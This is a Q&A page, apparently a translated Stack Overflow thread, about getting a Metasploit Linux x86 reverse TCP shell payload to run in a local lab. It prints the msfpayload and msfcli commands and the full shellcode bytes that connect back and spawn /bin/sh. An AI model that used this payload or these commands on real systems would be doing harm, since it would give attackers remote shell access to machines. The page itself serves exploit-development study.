如何单独运行linux / x86 / shell_reverse_tcp有效负载?

时间:2014-01-04 21:21:31

标签: metasploit

我正在尝试运行linux / x86 / shell_reverse_tcp有效负载。如果我查看有效负载的摘要,它看起来像主机和端口是两个要求,如下所示。

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_reverse_tcp S

       Name: Linux Command Shell, Reverse TCP Inline
     Module: payload/linux/x86/shell_reverse_tcp
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 190
       Rank: Normal

Provided by:
  Ramon de C Valle <rcvalle@metasploit.com>

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port

Description:
  Connect back to attacker and spawn a command shell

因为我在本地主机上运行它,所以我使用ifconfig查找我的本地IP地址。它似乎是10.0.1.38,如下所示

max@ubuntu-vm:~/SLAE/mod2$ ifconfig
eth0      Link encap:Ethernet  HWaddr 08:00:27:bf:ec:33  
          inet addr:10.0.1.38  Bcast:10.0.1.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:febf:ec33/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7866 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5066 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3043939 (3.0 MB)  TX bytes:1149171 (1.1 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:310 errors:0 dropped:0 overruns:0 frame:0
          TX packets:310 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:29143 (29.1 KB)  TX bytes:29143 (29.1 KB)

所以我使用msfpayload命令输出shellcode,把它放在我的shellcode沙盒中,并编译

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload \
              -p linux/x86/shell_reverse_tcp LHOST=10.0.1.38 LPORT=3333 C
/*
 * linux/x86/shell_reverse_tcp - 68 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LHOST=10.0.1.38, LPORT=3333, 
 * ReverseConnectRetries=5, ReverseAllowProxy=false, 
 * PrependFork=false, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false, InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x0a\x00\x01\x26\x68"
"\x02\x00\x0d\x05\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
max@ubuntu-vm:~/SLAE/mod2$ gcc \
              -fno-stack-protector -z execstack -o shellcode shellcode.c

所以一切似乎都很好,除了当我尝试运行有效载荷时,我得到了一个分段错误。所以我的问题是如何成功运行此有效负载?

max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
Shellcode Length:  26
Segmentation fault (core dumped)
max@ubuntu-vm:~/SLAE/mod2$

1 个答案:

答案 0 :(得分:1)

这是一个reverse_shell,需要连接的东西。
您必须配置并创建一个reverse_handler,如下所示:

# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=10.0.1.38 LPORT=3333 E
相关问题
最新问题